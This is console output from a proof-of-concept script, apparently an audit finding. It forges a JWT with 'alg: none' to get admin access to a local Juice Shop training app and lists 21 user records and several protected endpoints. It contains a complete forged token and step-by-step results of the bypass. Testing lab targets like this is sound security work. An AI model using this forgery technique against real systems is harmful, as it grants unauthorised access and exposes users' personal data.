======================================================================
F-003: JWT alg:none Attack PoC
Target: http://localhost:3000
======================================================================

[*] Step 1: Checking target availability...
    [+] Target online: HTTP 200

[*] Step 2: Confirming /api/Users/ requires authentication (no token)...
    Status without token: HTTP 401
    [+] Endpoint is protected

[*] Step 3: Forging JWT token with alg:none...
    Forged token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6...
    Header:  {"typ": "JWT", "alg": "none"}
    Payload: {"status": "success", "data": {"id": 1, "username": "hacker", "email": "hacker@pwned.com", "role": "admin"}, "iat": 9999999999}

[*] Step 4: Using forged token on GET /api/Users/...
    HTTP Status: 200
    [CRITICAL] Vulnerability CONFIRMED — received 21 user records
      id=1 email=admin@juice-sh.op role=admin
      id=2 email=jim@juice-sh.op role=customer
      id=3 email=bender@juice-sh.op role=customer

[*] Step 5: Testing additional endpoints with forged token...
    [+] /api/Feedbacks/ -> HTTP 200
    [+] /api/Complaints/ -> HTTP 200
    [+] /rest/admin/application-version -> HTTP 200

[*] Step 6: Escalation — forging token for arbitrary user (id=1 admin)...
    [+] /api/Users/ with custom email claim -> HTTP 200

======================================================================
RESULTS SUMMARY
======================================================================
  target_online: True
  endpoint_protected_without_token: True
  forged_token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiJoYWNrZXIiLCJlbWFpbCI6ImhhY2tlckBwd25lZC5jb20iLCJyb2xlIjoiYWRtaW4ifSwiaWF0Ijo5OTk5OTk5OTk5fQ.
  users_exfiltrated: 21
  alg_none_bypass_confirmed: True
  additional_accessible_endpoints: ['/api/Feedbacks/', '/api/Complaints/', '/rest/admin/application-version']
  arbitrary_claim_accepted: True

FINAL VERDICT: [CRITICAL] VULNERABLE — alg:none bypass confirmed
